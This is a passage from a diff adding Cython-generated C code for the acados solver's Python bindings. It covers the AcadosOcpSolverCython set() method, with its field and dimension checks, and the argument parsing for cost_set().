if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 524, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(__pyx_t_7)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":526 + * if field_ not in constraints_fields + cost_fields + out_fields: + * raise Exception("AcadosOcpSolverCython.set(): {} is not a valid argument.\ + * \nPossible values are {}. Exiting.".format(field, \ # <<<<<<<<<<<<<< + * constraints_fields + cost_fields + out_fields + ['p'])) + * + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_AcadosOcpSolverCython_set_is_not, __pyx_n_s_format); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 526, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + + /* "acados_template/acados_ocp_solver_pyx.pyx":527 + * raise Exception("AcadosOcpSolverCython.set(): {} is not a valid argument.\ + * \nPossible values are {}. Exiting.".format(field, \ + * constraints_fields + cost_fields + out_fields + ['p'])) # <<<<<<<<<<<<<< + * + * dims = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, + */ + __pyx_t_1 = PyNumber_Add(__pyx_v_constraints_fields, __pyx_v_cost_fields); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 527, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_v_out_fields); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 527, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = PyList_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 527, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_p); + __Pyx_GIVEREF(__pyx_n_u_p); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_p); + __pyx_t_4 = PyNumber_Add(__pyx_t_2, __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 527, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = NULL; + __pyx_t_10 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_10 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_1, __pyx_v_field, __pyx_t_4}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_10, 2+__pyx_t_10); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 526, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":525 + * else: + * if field_ not in constraints_fields + cost_fields + out_fields: + * raise Exception("AcadosOcpSolverCython.set(): {} is not a valid argument.\ # <<<<<<<<<<<<<< + * \nPossible values are {}. Exiting.".format(field, \ + * constraints_fields + cost_fields + out_fields + ['p'])) + */ + __pyx_t_5 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 525, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_Raise(__pyx_t_5, 0, 0, 0); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __PYX_ERR(0, 525, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":524 + * assert acados_solver.acados_update_params(self.capsule, stage, value.data, value.shape[0]) == 0 + * else: + * if field_ not in constraints_fields + cost_fields + out_fields: # <<<<<<<<<<<<<< + * raise Exception("AcadosOcpSolverCython.set(): {} is not a valid argument.\ + * \nPossible values are {}. Exiting.".format(field, \ + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":530 + * + * dims = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, + * self.nlp_dims, self.nlp_out, stage, field) # <<<<<<<<<<<<<< + * + * if value_.shape[0] != dims: + */ + __pyx_t_11 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_11) && PyErr_Occurred())) __PYX_ERR(0, 530, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":529 + * constraints_fields + cost_fields + out_fields + ['p'])) + * + * dims = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_out, stage, field) + * + */ + __pyx_t_5 = __Pyx_PyInt_From_int(ocp_nlp_dims_get_from_attr(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_out, __pyx_v_stage, __pyx_t_11)); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 529, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_v_dims = __pyx_t_5; + __pyx_t_5 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":532 + * self.nlp_dims, self.nlp_out, stage, field) + * + * if value_.shape[0] != dims: # <<<<<<<<<<<<<< + * msg = 'AcadosOcpSolverCython.set(): mismatching dimension for field "{}" '.format(field_) + * msg += 'with dimension {} (you have {})'.format(dims, value_.shape[0]) + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_v_value_, __pyx_n_s_shape); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 532, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_3 = __Pyx_GetItemInt(__pyx_t_5, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 532, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = PyObject_RichCompare(__pyx_t_3, __pyx_v_dims, Py_NE); __Pyx_XGOTREF(__pyx_t_5); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 532, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_5); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 532, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(__pyx_t_7)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":533 + * + * if value_.shape[0] != dims: + * msg = 'AcadosOcpSolverCython.set(): mismatching dimension for field "{}" '.format(field_) # <<<<<<<<<<<<<< + * msg += 'with dimension {} (you have {})'.format(dims, value_.shape[0]) + * raise Exception(msg) + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_AcadosOcpSolverCython_set_mismat, __pyx_n_s_format); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 533, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = NULL; + __pyx_t_10 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_10 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_4, __pyx_v_field_}; + __pyx_t_5 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_10, 1+__pyx_t_10); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 533, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_v_msg = __pyx_t_5; + __pyx_t_5 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":534 + * if value_.shape[0] != dims: + * msg = 'AcadosOcpSolverCython.set(): mismatching dimension for field "{}" '.format(field_) + * msg += 'with dimension {} (you have {})'.format(dims, value_.shape[0]) # <<<<<<<<<<<<<< + * raise Exception(msg) + * + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_with_dimension_you_have, __pyx_n_s_format); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 534, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_v_value_, __pyx_n_s_shape); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 534, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_1 = __Pyx_GetItemInt(__pyx_t_4, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 534, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = NULL; + __pyx_t_10 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_10 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_4, __pyx_v_dims, __pyx_t_1}; + __pyx_t_5 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_10, 2+__pyx_t_10); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 534, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_t_3 = PyNumber_InPlaceAdd(__pyx_v_msg, __pyx_t_5); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 534, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF_SET(__pyx_v_msg, __pyx_t_3); + __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":535 + * msg = 'AcadosOcpSolverCython.set(): mismatching dimension for field "{}" '.format(field_) + * msg += 'with dimension {} (you have {})'.format(dims, value_.shape[0]) + * raise Exception(msg) # <<<<<<<<<<<<<< + * + * if field_ in constraints_fields: + */ + __pyx_t_3 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_v_msg); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 535, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_Raise(__pyx_t_3, 0, 0, 0); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __PYX_ERR(0, 535, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":532 + * self.nlp_dims, self.nlp_out, stage, field) + * + * if value_.shape[0] != dims: # <<<<<<<<<<<<<< + * msg = 'AcadosOcpSolverCython.set(): mismatching dimension for field "{}" '.format(field_) + * msg += 'with dimension {} (you have {})'.format(dims, value_.shape[0]) + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":537 + * raise Exception(msg) + * + * if field_ in constraints_fields: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_constraints_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) + */ + __pyx_t_7 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_v_constraints_fields, Py_EQ)); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 537, __pyx_L1_error) + if (__pyx_t_7) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":539 + * if field_ in constraints_fields: + * acados_solver_common.ocp_nlp_constraints_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) # <<<<<<<<<<<<<< + * elif field_ in cost_fields: + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, + */ + __pyx_t_12 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_12) && PyErr_Occurred())) __PYX_ERR(0, 539, __pyx_L1_error) + __pyx_t_8 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_value)); if (unlikely(__pyx_t_8 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 539, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":538 + * + * if field_ in constraints_fields: + * acados_solver_common.ocp_nlp_constraints_model_set(self.nlp_config, # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_in, stage, field, value.data) + * elif field_ in cost_fields: + */ + (void)(ocp_nlp_constraints_model_set(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_in, __pyx_v_stage, __pyx_t_12, ((void *)__pyx_t_8))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":537 + * raise Exception(msg) + * + * if field_ in constraints_fields: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_constraints_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) + */ + goto __pyx_L6; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":540 + * acados_solver_common.ocp_nlp_constraints_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) + * elif field_ in cost_fields: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) + */ + __pyx_t_7 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_v_cost_fields, Py_EQ)); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 540, __pyx_L1_error) + if (__pyx_t_7) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":542 + * elif field_ in cost_fields: + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) # <<<<<<<<<<<<<< + * elif field_ in out_fields: + * acados_solver_common.ocp_nlp_out_set(self.nlp_config, + */ + __pyx_t_13 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_13) && PyErr_Occurred())) __PYX_ERR(0, 542, __pyx_L1_error) + __pyx_t_8 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_value)); if (unlikely(__pyx_t_8 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 542, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":541 + * self.nlp_dims, self.nlp_in, stage, field, value.data) + * elif field_ in cost_fields: + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_in, stage, field, value.data) + * elif field_ in out_fields: + */ + (void)(ocp_nlp_cost_model_set(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_in, __pyx_v_stage, __pyx_t_13, ((void *)__pyx_t_8))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":540 + * acados_solver_common.ocp_nlp_constraints_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) + * elif field_ in cost_fields: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) + */ + goto __pyx_L6; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":543 + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) + * elif field_ in out_fields: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_out_set(self.nlp_config, + * self.nlp_dims, self.nlp_out, stage, field, value.data) + */ + __pyx_t_7 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_v_out_fields, Py_EQ)); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 543, __pyx_L1_error) + if (__pyx_t_7) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":545 + * elif field_ in out_fields: + * acados_solver_common.ocp_nlp_out_set(self.nlp_config, + * self.nlp_dims, self.nlp_out, stage, field, value.data) # <<<<<<<<<<<<<< + * elif field_ in mem_fields: + * acados_solver_common.ocp_nlp_set(self.nlp_config, \ + */ + __pyx_t_14 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_14) && PyErr_Occurred())) __PYX_ERR(0, 545, __pyx_L1_error) + __pyx_t_8 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_value)); if (unlikely(__pyx_t_8 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 545, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":544 + * self.nlp_dims, self.nlp_in, stage, field, value.data) + * elif field_ in out_fields: + * acados_solver_common.ocp_nlp_out_set(self.nlp_config, # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_out, stage, field, value.data) + * elif field_ in mem_fields: + */ + ocp_nlp_out_set(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_out, __pyx_v_stage, __pyx_t_14, ((void *)__pyx_t_8)); + + /* "acados_template/acados_ocp_solver_pyx.pyx":543 + * acados_solver_common.ocp_nlp_cost_model_set(self.nlp_config, + * self.nlp_dims, self.nlp_in, stage, field, value.data) + * elif field_ in out_fields: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_out_set(self.nlp_config, + * self.nlp_dims, self.nlp_out, stage, field, value.data) + */ + goto __pyx_L6; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":546 + * acados_solver_common.ocp_nlp_out_set(self.nlp_config, + * self.nlp_dims, self.nlp_out, stage, field, value.data) + * elif field_ in mem_fields: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_set(self.nlp_config, \ + * self.nlp_solver, stage, field, value.data) + */ + __pyx_t_7 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_v_mem_fields, Py_EQ)); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 546, __pyx_L1_error) + if (__pyx_t_7) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":548 + * elif field_ in mem_fields: + * acados_solver_common.ocp_nlp_set(self.nlp_config, \ + * self.nlp_solver, stage, field, value.data) # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_15 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_15) && PyErr_Occurred())) __PYX_ERR(0, 548, __pyx_L1_error) + __pyx_t_8 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_value)); if (unlikely(__pyx_t_8 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 548, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":547 + * self.nlp_dims, self.nlp_out, stage, field, value.data) + * elif field_ in mem_fields: + * acados_solver_common.ocp_nlp_set(self.nlp_config, \ # <<<<<<<<<<<<<< + * self.nlp_solver, stage, field, value.data) + * + */ + ocp_nlp_set(__pyx_v_self->nlp_config, __pyx_v_self->nlp_solver, __pyx_v_stage, __pyx_t_15, ((void *)__pyx_t_8)); + + /* "acados_template/acados_ocp_solver_pyx.pyx":546 + * acados_solver_common.ocp_nlp_out_set(self.nlp_config, + * self.nlp_dims, self.nlp_out, stage, field, value.data) + * elif field_ in mem_fields: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_set(self.nlp_config, \ + * self.nlp_solver, stage, field, value.data) + */ + } + __pyx_L6:; + } + __pyx_L3:; + + /* "acados_template/acados_ocp_solver_pyx.pyx":492 + * + * # Note: this function should not be used anymore, better use cost_set, constraints_set + * def set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * + * """ + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + { PyObject *__pyx_type, *__pyx_value, *__pyx_tb; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&__pyx_type, &__pyx_value, &__pyx_tb); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_value.rcbuffer->pybuffer); + __Pyx_ErrRestore(__pyx_type, __pyx_value, __pyx_tb);} + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.set", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + goto __pyx_L2; + __pyx_L0:; + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_value.rcbuffer->pybuffer); + __pyx_L2:; + __Pyx_XDECREF(__pyx_v_cost_fields); + __Pyx_XDECREF(__pyx_v_constraints_fields); + __Pyx_XDECREF(__pyx_v_out_fields); + __Pyx_XDECREF(__pyx_v_mem_fields); + __Pyx_XDECREF(__pyx_v_field); + __Pyx_XDECREF((PyObject *)__pyx_v_value); + __Pyx_XDECREF(__pyx_v_dims); + __Pyx_XDECREF(__pyx_v_msg); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":551 + * + * + * def cost_set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set numerical data in the cost module of the solver. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_37cost_set(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_36cost_set, "\n Set numerical data in the cost module of the solver.\n\n :param stage: integer corresponding to shooting node\n :param field: string, e.g. 'yref', 'W', 'ext_cost_num_hess'\n :param value: of appropriate size\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_37cost_set = {"cost_set", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_37cost_set, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_36cost_set}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_37cost_set(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + int __pyx_v_stage; + PyObject *__pyx_v_field_ = 0; + PyObject *__pyx_v_value_ = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("cost_set (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_stage,&__pyx_n_s_field_2,&__pyx_n_s_value,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_stage)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 551, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field_2)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 551, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("cost_set", 1, 3, 3, 1); __PYX_ERR(0, 551, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_value)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 551, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("cost_set", 1, 3, 3, 2); __PYX_ERR(0, 551, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "cost_set") < 0)) __PYX_ERR(0, 551, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + } + __pyx_v_stage = __Pyx_PyInt_As_int(values[0]); if (unlikely((__pyx_v_stage == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 551, __pyx_L3_error) + __pyx_v_field_ = ((PyObject*)values[1]); + __pyx_v_value_ = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("cost_set", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 551, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.cost_set", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_field_), (&PyUnicode_Type), 1, "field_", 1))) __PYX_ERR(0, 551, __pyx_L1_error) + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_36cost_set(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_stage, __pyx_v_field_, __pyx_v_value_); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_36cost_set(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_, PyObject *__pyx_v_value_) { + PyObject *__pyx_v_field = NULL; + int __pyx_v_dims[2]; + __Pyx_memviewslice __pyx_v_value = { 0, 0, { 0 }, { 0 }, { 0 } }; + PyObject *__pyx_v_value_shape = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + char const *__pyx_t_2; + Py_ssize_t __pyx_t_3; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + int __pyx_t_8; + __Pyx_memviewslice __pyx_t_9 = { 0, 0, { 0 }, { 0 }, { 0 } }; + int __pyx_t_10; + Py_UCS4 __pyx_t_11; + char const *__pyx_t_12; + Py_ssize_t __pyx_t_13; + Py_ssize_t __pyx_t_14; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + 